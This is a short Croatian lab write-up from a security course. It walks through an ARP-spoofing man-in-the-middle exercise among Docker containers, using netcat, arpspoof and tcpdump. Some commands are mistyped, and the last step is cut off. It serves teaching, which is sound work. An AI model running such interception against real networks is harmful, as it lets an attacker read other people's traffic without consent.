# SRP

1.lab.vjezba

Imamo 3 racunala u virtualiziranioj Docker mrezi, station-1 i station -2 (zrtve), te evil station (napadac). Izvest cemo man in the middle napad.

-Kloniramo direktorij sa 

    $ git clone [https://github.com/mcagalj/SRP-2021-22](https://github.com/mcagalj/SRP-2021-22)

-Sa 

   $ start. sh i 

    $stop. sh 

   pokrecemo i zaustavljamo docker kontejnere

-Sa  

    $ docker ps 

    izlistavamo pokrenute kontejnere

-Pokrecemo interaktivni shell u station-1 sa

    $ docker ps exec -it sh

- Dohvacamo  konfiguracije mreznog interfejsa sa

      $ ifconfig

  Dobivamo informacije o IP adresi i adresi mreznog uredaja

-Provjerimo nalazi li se station-2 na istoj mrezi sa

    $ ping station-2

-Pokrecemo interaktivni shell u station -2

    $ docker exec -it station-2 sh

-na station-1 otvaramo server TCP socket na portu 8080

    $ netcat -l -p 8080

-Na station -2  otvaramo client TCP socket na hostnameu station-1 8080

    $ netcat station-1 8080

-Pokrecemo interaktivni shell u evil- station

    $docker exec -it evil -station sh

-Izvrsavamo napad tako da u evil station pokrenemo arpspoof

    $arpspoof -t station-1 station-2

-Pokrscemo tcpdump u evil-station i pratimo

    $tcpdump

-Gasimo proslijeđivanje spoofanih paketa 

   $ echo 0